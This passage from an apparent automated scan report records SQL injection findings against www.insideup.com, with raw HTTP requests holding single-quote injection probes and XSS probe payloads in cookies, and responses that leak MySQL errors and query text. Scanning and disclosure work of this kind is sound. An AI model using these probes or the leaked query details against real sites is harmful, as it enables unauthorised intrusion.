OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 04:01:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=k8k2g0c32sk4lt20er8vi7vs76; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/Marketing_Articles/How_Do_You_Pay_For_Leads.html'' was not found on this server.</p>

1.3. http://www.insideup.com/ppc/Marketing_Articles/Top_Marketing_Challenges_for_2010.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/Marketing_Articles/Top_Marketing_Challenges_for_2010.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/Marketing_Articles'/Top_Marketing_Challenges_for_2010.html HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:01:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4vfoifr1viv9bhneet25e77i03; path=/
Content-Length: 2270
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
up_id = prj.groupId    
    where prj.project_page_url = 'Marketing_Articles'/Top_Marketing_Challenges_for_2010.html' OR prj.project_page_url = 'Marketing_Articles'/Top_Marketing_Challenges_for_2010.html/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'Marketing_Articles'/Top_Marketing_Challenges_for_20' at line 5

Request 2

GET /ppc/Marketing_Articles''/Top_Marketing_Challenges_for_2010.html HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 04:01:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7fmg7dajp7jcbuk0iekdqqahb4; path=/
Content-Length: 138
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/Marketing_Articles''/Top_Marketing_Challenges_for_2010.html was not found on this server.</p>

1.4. http://www.insideup.com/ppc/Marketing_Articles/Top_Marketing_Challenges_for_2010.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/Marketing_Articles/Top_Marketing_Challenges_for_2010.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/Marketing_Articles/Top_Marketing_Challenges_for_2010.html' HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:01:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=31cjhl13cc1f5cqkeqlvftvrv4; path=/
Content-Length: 2270
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
up_id = prj.groupId    
    where prj.project_page_url = 'Marketing_Articles/Top_Marketing_Challenges_for_2010.html'' OR prj.project_page_url = 'Marketing_Articles/Top_Marketing_Challenges_for_2010.html'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Marketing_Articles/Top_Marketing_Challenges_for_2010.html'/'
   union select prj.c' at line 5

Request 2

GET /ppc/Marketing_Articles/Top_Marketing_Challenges_for_2010.html'' HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=5BFB6E485A4D0B2638C70D220E88195F; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 04:01:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gndmio8bgpokorirjm05dufqa1; path=/
Content-Length: 138
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/Marketing_Articles/Top_Marketing_Challenges_for_2010.html'' was not found on this server.</p>

1.5. http://www.insideup.com/ppc/Marketing_Articles/Using_Targeted_Sales_Messages.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/Marketing_Articles/Using_Targeted_Sales_Messages.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/Marketing_Articles'/Using_Targeted_Sales_Messages.html HTTP/1.1
Referer: http://www.insideup.com/marketingarticles.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
